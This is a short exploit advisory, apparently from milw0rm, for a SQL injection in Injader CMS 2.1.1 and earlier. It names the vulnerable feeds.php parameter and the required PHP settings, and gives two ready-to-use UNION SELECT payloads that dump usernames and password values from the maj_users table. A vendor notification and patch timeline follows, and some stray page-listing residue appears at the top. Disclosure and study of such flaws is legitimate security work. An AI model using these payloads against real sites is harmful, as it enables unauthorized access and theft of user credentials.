30 lines
No EOL
691 B
Text
30 lines
No EOL
691 B
Text
Injader CMS
|
|
http://www.injader.com/
|
|
|
|
|
|
|
|
- (= 2.1.1 -
|
|
|
|
- SQL -
|
|
http://localhost/upload/feeds.php?name=articles&id=<SQL>
|
|
magic_quotes_gpc = Off
|
|
register_globals = On
|
|
|
|
|
|
Username (urlencode):
|
|
2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(username AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 2511=2511
|
|
Pass:
|
|
2 UNION ALL SELECT NULL, NULL, NULL, NULL, CONCAT(CHAR(0),IFNULL(CAST(userpass AS CHAR(10000)), CHAR(32)),CHAR(0)), NULL, NULL, NULL FROM maj_users# AND 8758=8758
|
|
|
|
|
|
|
|
- Timeline -
|
|
Author notified: Nov 30, Dec 09,10
|
|
Injader 2.1.2: Dec 12
|
|
Public disclosure: Dec 18
|
|
|
|
|
|
- Seasons Greetings -
|
|
- http://nukeit.org -
|
|
|
|
# milw0rm.com [2008-12-18] |